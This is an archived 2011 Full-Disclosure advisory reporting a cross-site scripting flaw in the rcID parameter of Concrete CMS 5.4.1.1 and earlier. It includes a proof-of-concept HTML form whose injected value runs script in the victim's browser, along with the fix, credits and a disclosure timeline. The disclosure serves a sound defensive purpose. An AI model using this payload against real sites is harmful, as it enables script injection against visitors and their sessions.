| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 23 Aug 2011 01:45:28 +0800 From: YGN Ethical Hacker Group <lists@...g.net> To: full-disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq <bugtraq@...urityfocus.com>, secalert@...urityreason.com, bugs@...uritytracker.com, vuln <vuln@...unia.com>, vuln@...urity.nnov.ru, news@...uriteam.com, moderators@...db.org, submissions@...ketstormsecurity.org Subject: Concrete CMS 5.4.1.1 <= Cross Site Scripting Concrete CMS 5.4.1.1 <= Cross Site Scripting 1. OVERVIEW Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click. 3. VULNERABILITY DESCRIPTION The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED CMS 5.4.1.1 <= 5. PROOF-OF-CONCEPT/EXPLOIT vulnerable parameter: rcID <form action="http://[target]/Concrete/index.php/login/do_login/" method="post"> <input type="hidden" name="uName" value="test" /> <input type="hidden" name="uPassword" value="test" /> <input type="hidden" name="rcID" value='" style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover="alert(/XSS/)' /> <input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" /> </form> 6. SOLUTION Upgrade to 5.4.2 or higher. 7. VENDOR Concrete CMS Developers http://www.concrete5.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-04-14: vulnerability reported 2011-08-04: vendor released fixed version 2011-08-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting Project Home: http://www.concrete5.org/ Vendor Release Note: http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/ #yehg [2011-08-23] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists